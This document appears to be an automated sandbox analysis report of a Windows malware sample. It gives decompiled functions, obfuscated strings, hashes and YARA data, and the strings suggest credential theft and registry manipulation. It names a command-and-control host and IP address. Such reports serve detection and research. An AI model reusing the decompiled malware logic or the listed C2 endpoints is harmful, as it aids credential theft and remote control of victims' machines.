Opcode Fuzzy Hash: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
Instruction Fuzzy Hash: 6802ADB04087419FD310EF6AC58875BBBE4BF84358F108D2EF4948B291E7B9D5898F96

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE8C, Relevance: 7.7, Strings: 6, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040FE8C(signed int __eax, void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v56;
				char _v560;
				char _v1108;
				void* _v1364;
				char _v1368;
				signed int _v1396;
				char _v1404;
				char _v1432;
				char _v1436;
				char _v1444;
				signed short _v1448;
				signed short _v1450;
				signed short _v1452;
				signed short _v1454;
				signed short _v1458;
				signed short _v1460;
				char _v1464;
				char* _v1468;
				char _v1476;
				intOrPtr _v1480;
				char* _v1488;
				char* _v1496;
				char _v1500;
				intOrPtr _v1504;
				void* _v1508;
				signed int _v1512;
				signed int _v1516;
				signed int _v1520;
				signed int _v1524;
				signed int _v1528;
				signed int _v1532;
				signed int _v1536;
				signed int _v1540;
				signed int _v1544;
				char* _v1548;
				intOrPtr _v1552;
				char _v1556;
				char* _t79;
				void* _t82;
				intOrPtr* _t84;
				signed int _t85;
				signed int _t87;
				void* _t93;
				signed int _t94;
				signed int _t102;
				void* _t111;
				void* _t112;
				char* _t116;
				void* _t117;
				char* _t119;
				intOrPtr* _t121;
				char* _t123;
				char* _t124;
				signed int _t127;
				intOrPtr* _t128;
				void* _t129;

				_t118 = __edx;
				_t117 = __ecx;
				_v1496 = 0;
				_v1500 = 2;
				L0041F664();
				_push(__edx);
				_push(__edx);
				if(__eax == 0xffffffff) {
					L3:
					_v1496 = 0;
					return E00405D7D(_t118, _v4, 0xbf, 0);
				}
				_t115 = __eax;
				_t79 =  &_v1364;
				_v1364 = 0x128;
				_v1508 = __eax;
				_v1504 = _t79;
				L0041F52C();
				_push(_t126);
				if(_t79 != 0) {
					E0041236C( &_v1432,  &_v1432, 0x8000);
					_t82 = E004081AA("Ed5FWSQid_4idLCldjfD");
					_t84 = E00407F8E(_t118, E00407F7A(_t118, "psapi.dll"), _t82);
					_t121 = _t84;
					if(_t84 == 0) {
						_t112 = E004081AA("Ed5FWSQid_4idLCldjfD");
						_t121 = E00407F8E(_t118, E00407F7A(_t118, "kernel32.dll"), _t112);
					}
					_t127 =  &_v560;
					do {
						_t85 = _v1364;
						_v1512 = 0;
						_v1516 = 0x410;
						_v1508 = _t85;
						L0041F53C();
						_t129 = _t128 - 0xc;
						_t123 = _t85;
						if(_t85 == 0 || _t121 == 0) {
							L10:
							E00412548(_t127, 0x424374, 0x204);
							goto L11;
						} else {
							_v1516 = 0x204;
							_v1520 = _t127;
							_v1524 = 0;
							_v1528 = _t85;
							_t111 =  *_t121();
							_t129 = _t129 - 0x10;
							if(_t111 != 0) {
								L11:
								_t87 =  &_v1452;
								_t119 =  &_v1460;
								_v1528 = _t123;
								_v1512 = _t87;
								_v1516 = _t87;
								_v1520 = _t87;
								_v1524 = _t119;
								_v1468 = _t119;
								L0041F5A4();
								_t128 = _t129 - 0x14;
								if(_t87 == 0) {
									L23:
									E00412548( &_v1436, 0x424374, 0x20);
									goto L14;
								}
								_t119 = _v1488;
								if(_v1480 == 0) {
									goto L23;
								}
								_t102 =  &_v1452;
								_v1548 = _t119;
								_v1544 = _t102;
								L0041F644();
								_push(_t102);
								_push(_t102);
								_v1548 = "%.2d/%.2d/%d %.2d:%.2d:%.2d";
								_v1552 = 0x20;
								_v1524 = _v1448 & 0x0000ffff;
								_v1528 = _v1450 & 0x0000ffff;
								_v1532 = _v1452 & 0x0000ffff;
								_v1536 = _v1460 & 0x0000ffff;
								_v1540 = _v1458 & 0x0000ffff;
								_v1544 = _v1454 & 0x0000ffff;
								_v1556 =  &_v1444;
								E004127A8();
								goto L14;
							}
							goto L10;
						}
						L14:
						if(_t123 != 0) {
							_v1548 = _t123;
							L0041F694();
							_push(_t123);
						}
						_t124 =  &_v1108;
						_v1528 = _t127;
						_v1540 = 0x424376;
						_v1544 = 0x204;
						_v1524 =  &_v1436;
						_v1548 = _t124;
						_v1532 = _v1396;
						_v1536 =  &_v1368;
						_t93 = E004127A8();
						if(_t93 > 0) {
							E00412458( &_v1464, _t119,  &_v1464, _t124, _t93);
						}
						_t94 =  &_v1404;
						_v1548 = _t115;
						_v1544 = _t94;
						L0041F524();
						_push(_t117);
						_push(_t117);
					} while (_t94 != 0);
					_v1556 = _t115;
					L0041F694();
					_push(_t119);
					_t116 =  &_v1476;
					if(_v1468 == 0) {
						_v1548 = 0;
						_v1552 = 0;
						_v1556 = 0xbf;
					} else {
						 *_t128 = _t116;
						_v1548 = E00412540();
						_v1556 = 0xbe;
						_v1552 = _v1476;
					}
					 *_t128 = _v56;
					E00405D7D(_t119);
					 *_t128 = _t116;
					return E004123B1();
				}
				_v1516 = __eax;
				L0041F694();
				goto L3;
			}

0x0040fe8c
0x0040fe8c
0x0040fe96
0x0040fe9e
0x0040fea5
0x0040fead
0x0040feae
0x0040feaf
0x0040fee0
0x0040fee7
0x00000000
0x0040ff02
0x0040feb1
0x0040feb3
0x0040feba
0x0040fec5
0x0040fec8
0x0040fecc
0x0040fed4
0x0040fed5
0x0040ff1b
0x0040ff27
0x0040ff41
0x0040ff48
0x0040ff4a
0x0040ff53
0x0040ff72
0x0040ff72
0x0040ff74
0x0040ff7b
0x0040ff7b
0x0040ff82
0x0040ff8a
0x0040ff91
0x0040ff95
0x0040ff9a
0x0040ff9f
0x0040ffa1
0x0040ffc7
0x0040ffda
0x00000000
0x0040ffa7
0x0040ffa7
0x0040ffaf
0x0040ffb3
0x0040ffbb
0x0040ffbe
0x0040ffc0
0x0040ffc5
0x0040ffdf
0x0040ffdf
0x0040ffe3
0x0040ffe7
0x0040ffea
0x0040ffee
0x0040fff2
0x0040fff6
0x0040fffa
0x0040fffe
0x00410003
0x00410008
0x00410167
0x0041017e
0x00000000
0x0041017e
0x00410013
0x00410017
0x00000000
0x00000000
0x0041001d
0x00410021
0x00410024
0x00410028
0x0041002d
0x0041002e
0x00410034
0x0041003c
0x00410044
0x0041004d
0x00410056
0x0041005f
0x00410068
0x00410071
0x00410079
0x0041007c
0x00000000
0x0041007c
0x00000000
0x0040ffc5
0x00410081
0x00410083
0x00410085
0x00410088
0x0041008d
0x0041008d
0x00410092
0x00410099
0x0041009d
0x004100a5
0x004100ad
0x004100b8
0x004100bb
0x004100c6
0x004100ca
0x004100d1
0x004100e2
0x004100e2
0x004100e7
0x004100ee
0x004100f1
0x004100f5
0x004100fc
0x004100fd
0x004100fd
0x00410104
0x00410107
0x0041010c
0x00410112
0x00410116
0x00410136
0x0041013e
0x00410146
0x00410118
0x00410118
0x00410120
0x00410128
0x00410130
0x00410130
0x00410155
0x00410158
0x0041015d
0x00000000
0x00410160
0x0040fed7
0x0040feda
0x00000000

Strings

, xrefs: 0041016B
kernel32.dll, xrefs: 0040FF58
, xrefs: 0041003C
psapi.dll, xrefs: 0040FF2C
Ed5FWSQid_4idLCldjfD, xrefs: 0040FF20, 0040FF4C
%.2d/%.2d/%d %.2d:%.2d:%.2d, xrefs: 00410034

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $ $%.2d/%.2d/%d %.2d:%.2d:%.2d$Ed5FWSQid_4idLCldjfD$kernel32.dll$psapi.dll
API String ID: 0-116260847
Opcode ID: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
Instruction ID: 6fadafcb3b73e839ba5121377a1d1d4624def229cb7cc3727062cbee2f3d546e
Opcode Fuzzy Hash: 87dd904289ac3e1578d706810ecc99957de8afbf6ba3ebc73ccc607b43d7159d
Instruction Fuzzy Hash: BB81C3B0408741AED720AF25C54566FBBE4AF85748F018D2EF8D887351E7BDC989CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00408FE0, Relevance: 7.7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

Strings

-m "%s", xrefs: 004090AB
MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56\%6, xrefs: 004091AC
M5QV9C5I, xrefs: 004091F0
MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\, xrefs: 0040915E
rb+, xrefs: 0040922C
"%s", xrefs: 004091D8

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: "%s"$-m "%s"$M5QV9C5I$MT_qUDrj\F4Y0W6W85\DY542d Md5Qs\XR65CiidS PWlsWRdR56\%6$MT_qUDrj\F4Y0W6W85\U4RSWg6\PQ00dR5zd064WR\rQR\$rb+
API String ID: 0-3789651114
Opcode ID: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
Instruction ID: cf1332e757baf714fb04fabdc2a14f291af18396ddc48b811abeeedaa7cc8274
Opcode Fuzzy Hash: 997c129668c957d265a6ef581973f80193b3a19ca8de808bc7fa0e786e146993
Instruction Fuzzy Hash: 4D61C7B04087119AD710BF61D64536EBBE1AF81348F41C86EE4C86B383CBBD8985DB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00413748, Relevance: 7.6, Strings: 6, Instructions: 132COMMON

Download Yara Rule

Strings

WINDIR, xrefs: 0041387E
PATH, xrefs: 0041386B
Password, xrefs: 004138F7
, xrefs: 00413816
chongmei33.myddns.rocks:57438;37.120.208.40:57438;, xrefs: 00413928
Unknown, xrefs: 004137E0

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $PATH$Password$Unknown$WINDIR$chongmei33.myddns.rocks:57438;37.120.208.40:57438;
API String ID: 0-3033985513
Opcode ID: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
Instruction ID: 88353113fceb9506f3b36d61bfde8eef9921c9a466ae1bfd82caa565229af05a
Opcode Fuzzy Hash: 1d897faeec5f9ead515169eab6bed68e0673cd8fb9b034d1bed7294f75ea0837
Instruction Fuzzy Hash: A2619CB49087849BD720EF65C18469EFBE0BF89348F408D2EE8D887351E7789548CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00409E61, Relevance: 7.6, Strings: 6, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409E61(void* __edx) {
				intOrPtr _v20;
				intOrPtr _v40;
				intOrPtr _v52;
				char _v60;
				void _v108;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				char _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				void* _t29;
				intOrPtr _t31;
				void* _t32;
				void* _t35;
				char* _t36;
				void* _t39;
				char _t45;
				void* _t46;
				intOrPtr* _t48;

				_t39 = __edx;
				memcpy( &_v108, L"ssdaClass", 5 << 2);
				_t48 = _t46 - 0x90 + 0xc;
				_t29 = E004081AA("rdn465d0rCgXRsQ5ad24Yd6");
				_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t29);
				 *0x42b9e4 = _t31;
				if(_t31 != 0) {
					_t32 = E004081AA("Ed5rCgXRsQ5aC5C");
					_t31 = E00407F8E(_t39, E00407F7A(_t39, "user32.dll"), _t32);
					 *0x42b9e0 = _t31;
					if(_t31 == 0) {
						goto L1;
					} else {
						_t45 =  &_v60;
						_t35 =  &_v108;
						_t31 = E004129E4(_t45, 0, 0x30);
						_v156 = _t45;
						_v60 = 0x30;
						_v52 = E00409CF9;
						_v40 = 0;
						_v20 = _t35;
						L0041F854();
						_push(0);
						if(_t31 != 0) {
							_v156 = _t35;
							_v116 = 0;
							_v120 = 0;
							_v124 = 0;
							_v128 = 0xfffffffd;
							_v132 = 0;
							_v136 = 0;
							_v140 = 0;
							_v144 = 0;
							_v148 = 0;
							_v152 = 0;
							 *_t48 = 0;
							L0041F8DC();
							_t48 = _t48 - 0x30;
							_t36 =  &_v140;
							if(_t31 == 0) {
								goto L4;
							} else {
								while(1) {
									_v196 = 0;
									_v200 = 0;
									_v204 = 0;
									 *_t48 = _t36;
									L0041F884();
									_t48 = _t48 - 0x10;
									if(_t31 <= 0) {
										break;
									}
									 *_t48 = _t36;
									L0041F814();
									_push(_t31);
									 *_t48 = _t36;
									L0041F8CC();
									_push(_t39);
								}
								 *0x422830 = 0xa;
							}
						} else {
							L4:
							 *0x422830 = 7;
						}
					}
				} else {
					L1:
					 *0x422830 = 6;
				}
				return _t31;
			}

0x00409e61
0x00409e78
0x00409e78
0x00409e81
0x00409e9b
0x00409ea2
0x00409ea7
0x00409ebf
0x00409ed9
0x00409ee0
0x00409ee5
0x00000000
0x00409ee7
0x00409ee7
0x00409eeb
0x00409f02
0x00409f07
0x00409f0a
0x00409f12
0x00409f1a
0x00409f22
0x00409f29
0x00409f31
0x00409f32
0x00409f43
0x00409f47
0x00409f4f
0x00409f57
0x00409f5f
0x00409f67
0x00409f6f
0x00409f77
0x00409f7f
0x00409f87
0x00409f8f
0x00409f97
0x00409f9e
0x00409fa3
0x00409fa8
0x00409fac
0x00000000
0x00409fae
0x00409fae
0x00409fae
0x00409fb6
0x00409fbe
0x00409fc6
0x00409fc9
0x00409fce
0x00409fd3
0x00000000
0x00000000
0x00409fd5
0x00409fd8
0x00409fdd
0x00409fde
0x00409fe1
0x00409fe6
0x00409fe6
0x00409fe9
0x00409fe9
0x00409f34
0x00409f34
0x00409f34
0x00409f34
0x00409f32
0x00409ea9
0x00409ea9
0x00409ea9
0x00409ea9
0x00409ffc

Strings

ssdaClass, xrefs: 00409E69
0, xrefs: 00409F0A
0, xrefs: 00409EEF
Ed5rCgXRsQ5aC5C, xrefs: 00409EB8
user32.dll, xrefs: 00409E86, 00409EC4
rdn465d0rCgXRsQ5ad24Yd6, xrefs: 00409E7A

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 0$0$Ed5rCgXRsQ5aC5C$rdn465d0rCgXRsQ5ad24Yd6$ssdaClass$user32.dll
API String ID: 0-2341246112
Opcode ID: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
Instruction ID: dc59c3b724a470855dcc4065ae2b59d1d9b3c777af613543eb6a0d926dcb9681
Opcode Fuzzy Hash: b71ffae2db478e6a0be3980e5627f6dd8d051567762edde8471df975e0d3e002
Instruction Fuzzy Hash: 863108B05183019AE310BF25D55531FBAE0BF84348F41892EF4C4AB292D7BD8949CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1F4, Relevance: 7.6, Strings: 6, Instructions: 67COMMON

Download Yara Rule

Strings

x64, xrefs: 0040B29C
@, xrefs: 0040B274
MT_qUDrj\FWk4iiC\%6\, xrefs: 0040B244
PQ00dR5zd064WR, xrefs: 0040B268
XR65Cii a40dY5W0Z, xrefs: 0040B2D8
MT_qUDrj\FWk4iiC\%6\%6\FC4R, xrefs: 0040B2B0

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: @$MT_qUDrj\FWk4iiC\%6\$MT_qUDrj\FWk4iiC\%6\%6\FC4R$PQ00dR5zd064WR$XR65Cii a40dY5W0Z$x64
API String ID: 0-4110341741
Opcode ID: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
Instruction ID: 72ec6481281fc5666a7dbf46cbeff2a2701b551c42623141a7dd164dfcf0ae83
Opcode Fuzzy Hash: cc911b79d2eefdb58db85e860f82a12d22a41f8e2a67b8aff7809e1b43347896
Instruction Fuzzy Hash: E221E0B0508301AED300AF26D54925EFBF4EF88308F418D2EE8D897241D7BD9685CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDD6, Relevance: 6.5, Strings: 5, Instructions: 236COMMON

Download Yara Rule

Strings

0x0D, xrefs: 0040F03B
encrypted_key, xrefs: 0040EEF8, 0040EF18
0x05, xrefs: 0040F04F
0x%02hhX, xrefs: 0040F027
!, xrefs: 0040EFD7

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: !$0x%02hhX$0x05$0x0D$encrypted_key
API String ID: 0-939079894
Opcode ID: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
Instruction ID: 786053efb03fb7134250340436023ef553204ed8f41ee6c066ba5e47f52fe47d
Opcode Fuzzy Hash: 805cf607740b1a5f9c37050675237c4453e90da5180a7e15037dfd845fdc5026
Instruction Fuzzy Hash: FEC1EAB1A053198FDB50DF25C844B9EBBF0BF45308F0588AEE489E7681D7789A84CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00411D8C, Relevance: 6.4, Strings: 5, Instructions: 195COMMON

Download Yara Rule

Strings

, xrefs: 00411E5A
6, xrefs: 00411F47
(, xrefs: 00411F58
(, xrefs: 00412003
BM, xrefs: 00411F32

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $($($6$BM
API String ID: 0-2637400849
Opcode ID: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
Instruction ID: c42d9fa6f562a18c3eedbb1c72d559f421865ac330c7369b2ec7bacda9b62638
Opcode Fuzzy Hash: d7d7e5d3c01187142e8c43228c98c6042b0c96f3a722dfa341cae57414d2b9e1
Instruction Fuzzy Hash: 4781BDB05093409FD310EF6AD68475BBBE4AF88744F40892EF58887351E7B9D8888B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00421320, Relevance: 6.4, Strings: 5, Instructions: 164COMMON

Download Yara Rule

Strings

c, xrefs: 0042153A
length < 16, xrefs: 00421525
length - i < CTR_BUFFER_LIMIT, xrefs: 0042154A
../nettle-3.5.1/ctr16.c, xrefs: 0042151D, 00421542
, xrefs: 004213B0

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $../nettle-3.5.1/ctr16.c$c$length - i < CTR_BUFFER_LIMIT$length < 16
API String ID: 0-535899598
Opcode ID: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
Instruction ID: 595662ab794f8c563696035dacf2dbdab12226766188b8df76e1304a900497cc
Opcode Fuzzy Hash: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
Instruction Fuzzy Hash: 1E71DDB5A083199FDB00EF69D48859EBBE0EF88354F01C92EF89997351C3389854CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0040C2DB, Relevance: 6.3, Strings: 5, Instructions: 91COMMON

Download Yara Rule

Strings

%6\.sQ0sid\CYYWQR56.fli, xrefs: 0040C2F8
<s0W5WYWi>, xrefs: 0040C36B
<RCld>, xrefs: 0040C3F1
<sC66gW0S>, xrefs: 0040C42A
APPDATA, xrefs: 0040C2E4

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %6\.sQ0sid\CYYWQR56.fli$<RCld>$<s0W5WYWi>$<sC66gW0S>$APPDATA
API String ID: 0-1218082621
Opcode ID: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
Instruction ID: 6048a10f2db6f6121dbf09b1e91f7eeb88fe885a8aaa66a3f769cde923567c5e
Opcode Fuzzy Hash: 6161f5786dfb79b59c73abb99621c92b81d561b40ce734a98eccfb102c6c407c
Instruction Fuzzy Hash: EC41D8B0408311DAD310AF25D58526EBAF4BF84758F50CA2FE4D897381D77C8585DB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004135F2, Relevance: 6.3, Strings: 5, Instructions: 85COMMON

Download Yara Rule

Strings

DiiWYC5dDRSXR454Ci4kdM4S, xrefs: 004135F8
advapi32.dll, xrefs: 00413622, 0041364A, 00413672
, xrefs: 004136EB
PIdYwqWwdRFdlVd06I4s, xrefs: 0041363C
_0ddM4S, xrefs: 00413664

Memory Dump Source

Source File: 0000001C.00000002.593259419.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: $DiiWYC5dDRSXR454Ci4kdM4S$PIdYwqWwdRFdlVd06I4s$_0ddM4S$advapi32.dll
API String ID: 0-1236196231
Opcode ID: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
Instruction ID: 116aa698c271bca6352efc5b2b04a0db36bd32a1f1fa5c071599b3e3fb9e0c6d
Opcode Fuzzy Hash: b21b00564509af26482fc33a2a05aa196c1ef1e3ba354a497be2837f40ba64fc
Instruction Fuzzy Hash: FC31D7B0509351ABD740AF65D59831FBAE0AF84348F41982EF5C49B381D7BDC5848B87

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC4, Relevance: 5.2, Strings: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00410FC4(void* __ecx, signed int _a4, signed int _a8, signed int _a12, void* _a16, intOrPtr _a32) {
				signed int _v0;
				signed int _v24;
				intOrPtr _v32;
				signed int _v44;
				char _v544;
				char _v548;
				char _v556;
				char _v568;
				char _v572;
				signed int _v576;
				void* _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				char* _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				signed int _v648;
				signed int* _v652;
				signed int _v656;
				signed int _v660;
				intOrPtr _v664;
				signed int _v668;
				intOrPtr _v692;
				signed int _t122;
				signed int _t129;
				signed int _t133;
				signed int _t134;
				void* _t136;
				void* _t137;

				_t137 = _t136 - 0x24c;
				_t134 = _a8;
				_t133 = _a12;
				_t122 = _a32 - 1;
				if(_t122 > 5) {
					L28:
					_t129 = 0;
					L29:
					return _t129;
				}
				switch( *((intOrPtr*)(_t122 * 4 +  &M0042444C))) {
					case 0:
						_v580 = 0;
						_v584 = 0xf003f;
						_v588 = 0;
						_v592 = 0;
						_v572 =  &_v548;
						_t125 =  &_v556;
						_v596 = 0;
						_v600 = _t133;
						_v604 = _t134;
						_v576 = _t125;
						L0041F454();
						_t137 = _t137 - 0x24;
						if(_t125 != 0) {
							goto L28;
						}
						_v620 = _t133;
						_v624 = _t134;
						_v628 = 1;
						goto L7;
					case 1:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _a8;
						_v616 = 0;
						_v620 = __ebp;
						_v604 = _a8;
						__eax = _a4;
						_v608 = _a4;
						__eax = _v0;
						_v612 = _v0;
						__eax = _v576;
						_v624 = __eax;
						L0041F41C();
						__esp = __esp - 0x18;
						__ebx = __eax;
						__eax = _v600;
						_v648 = __eax;
						L0041F45C();
						_push(__eax);
						if(__ebx != 0) {
							goto L28;
						}
						_v632 = __edi;
						_v636 = __esi;
						_v640 = 2;
						L7:
						_t130 =  &_v580;
						_v632 = "%c%.8x%s";
						_v636 = 0x204;
						_v640 =  &_v580;
						_t126 = E004127A8();
						goto L14;
					case 2:
						__eax = E0041086B(__ecx, __esi, __edi, __ebp);
						__bl = __al;
						if(__al == 0) {
							goto L28;
						}
						_v588 = __esi;
						__esi =  &_v544;
						_v580 = __ebp;
						_v584 = __edi;
						__eax = E004127A8( &_v544, 0x204, "%c%.8x%s%s", 3);
						if(__eax == 0) {
							goto L16;
						}
						goto L27;
					case 3:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax = _v576;
						_v620 = __ebp;
						_v624 = __eax;
						L0041F444();
						__ebx = __eax;
						_push(__ecx);
						_push(__ecx);
						__eax = _v584;
						_v632 = __eax;
						L0041F45C();
						_push(__eax);
						if(__ebx != 0) {
							goto L28;
						}
						__ebx =  &_v576;
						_v612 = __ebp;
						_v616 = __edi;
						_v620 = __esi;
						__eax = E004127A8( &_v576, 0x204, "%c%.8x%s\\%s", 4);
						L14:
						if(_t126 != 0) {
							_v628 = _t126;
							E00405D7D(_t132, _v32, 0xe8, _t130);
						}
						L16:
						_t129 = 1;
						goto L29;
					case 4:
						goto L28;
					case 5:
						__eax =  &_v556;
						_v592 = 0x2001f;
						_v596 = 0;
						_v600 = __edi;
						_v604 = __esi;
						_v588 = __eax;
						L0041F42C();
						__esp = __esp - 0x14;
						if(__eax != 0) {
							goto L28;
						}
						__eax =  &_v572;
						_v608 = 0;
						_v616 = 0;
						_v620 = __ebp;
						__ebx = 0;
						_v604 =  &_v572;
						__eax =  &_v568;
						_v612 =  &_v568;
						__eax = _v576;
						_v624 = __eax;
						L0041F424();
						__esp = __esp - 0x18;
						if(__eax != 0) {
							L25:
							__eax = _v600;
							_v648 = __eax;
							L0041F45C();
							_push(__eax);
							if(__bl == 0) {
								goto L29;
							}
							__eax = _v24;
							_v636 = __esi;
							__esi =  &_v592;
							_v624 = __ebp;
							_v632 = __edi;
							_v640 = 6;
							_v644 = 0x42443c;
							_v628 = _v24;
							_v648 = 0x204;
							_v652 =  &_v592;
							__eax = E004127A8();
							if(__eax == 0) {
								goto L29;
							}
							L27:
							_v592 = __eax;
							_a4 = E00405D7D(__edx, _a4, 0xe8, __esi);
							goto L29;
						}
						__eax = _v596;
						_v648 = __eax;
						L0041F714();
						_v588 = __eax;
						if(__eax == 0) {
							goto L25;
						}
						_v632 = __eax;
						__eax =  &_v592;
						__edx =  &_v596;
						_v640 = 0;
						_v644 = __ebp;
						_v636 =  &_v592;
						__eax = _v600;
						_v628 = __edx;
						_v648 = __eax;
						L0041F424();
						__esp = __esp - 0x18;
						if(__eax == 0) {
							__eax = _v620;
							_v664 = 0;
							_v652 = _v620;
							__eax = _v612;
							_v656 = _v612;
							__eax = _v616;
							_v660 = _v616;
							__eax = _v44;
							_v668 = _v44;
							__eax = _v624;
							 *__esp = __eax;
							L0041F41C();
							__esp = __esp - 0x18;
							if(__eax != 0) {
								goto L21;
							}
							__eax = _v648;
							_v692 = __ebp;
							 *__esp = __eax;
							L0041F444();
							_push(__edx);
							_push(__edx);
							__ebx = 0 | __eax == 0x00000000;
							L24:
							 &_v636 = E00407F59( &_v636);
							goto L25;
						}
						L21:
						__ebx = 0;
						goto L24;
				}
			}

0x00410fc8
0x00410fd5
0x00410fdc
0x00410fea
0x00410fee
0x004113a8
0x004113a8
0x004113aa
0x004113b6
0x004113b6
0x00410ff4
0x00000000
0x00410fff
0x00411007
0x0041100f
0x00411017
0x0041101f
0x00411023
0x00411027
0x0041102f
0x00411033
0x00411036
0x0041103a
0x0041103f
0x00411044
0x00000000
0x00000000
0x0041104a
0x0041104e
0x00411052
0x00000000
0x00000000
0x0041105f
0x00411063
0x0041106b
0x00411073
0x00411077
0x0041107a
0x0041107e
0x00411083
0x00411088
0x00000000
0x00000000
0x0041108e
0x00411095
0x0041109d
0x004110a1
0x004110a5
0x004110ac
0x004110b0
0x004110b7
0x004110bb
0x004110bf
0x004110c2
0x004110c7
0x004110ca
0x004110cc
0x004110d0
0x004110d3
0x004110da
0x004110db
0x00000000
0x00000000
0x004110e1
0x004110e5
0x004110e9
0x004110f1
0x004110f1
0x004110f5
0x004110fd
0x00411105
0x00411108
0x00000000
0x00000000
0x0041111d
0x00411124
0x00411126
0x00000000
0x00000000
0x0041112c
0x00411130
0x00411134
0x00411138
0x00411157
0x0041115e
0x00000000
0x00000000
0x00000000
0x00000000
0x00411169
0x0041116d
0x00411175
0x0041117d
0x00411181
0x00411184
0x00411188
0x0041118d
0x00411192
0x00000000
0x00000000
0x00411198
0x0041119c
0x004111a0
0x004111a3
0x004111a8
0x004111aa
0x004111ab
0x004111ac
0x004111b0
0x004111b3
0x004111ba
0x004111bb
0x00000000
0x00000000
0x004111c1
0x004111c5
0x004111c9
0x004111cd
0x004111ec
0x004111f1
0x004111f3
0x004111f5
0x0041120f
0x0041120f
0x00411214
0x00411214
0x00000000
0x00000000
0x00000000
0x00000000
0x0041121b
0x0041121f
0x00411227
0x0041122f
0x00411233
0x00411236
0x0041123a
0x0041123f
0x00411244
0x00000000
0x00000000
0x0041124a
0x0041124e
0x00411256
0x0041125e
0x00411262
0x00411264
0x00411268
0x0041126c
0x00411270
0x00411274
0x00411277
0x0041127c
0x00411281
0x00411337
0x00411337
0x0041133b
0x0041133e
0x00411345
0x00411346
0x00000000
0x00000000
0x00411348
0x0041134f
0x00411353
0x00411357
0x0041135b
0x0041135f
0x00411367
0x0041136f
0x00411373
0x0041137b
0x0041137e
0x00411385
0x00000000
0x00000000
0x00411387
0x00411387
0x004113a1
0x00000000
0x004113a1
0x00411287
0x0041128b
0x0041128e
0x00411295
0x00411299
0x00000000
0x00000000
0x0041129f
0x004112a3
0x004112a7
0x004112ab
0x004112b3
0x004112b7
0x004112bb
0x004112bf
0x004112c3
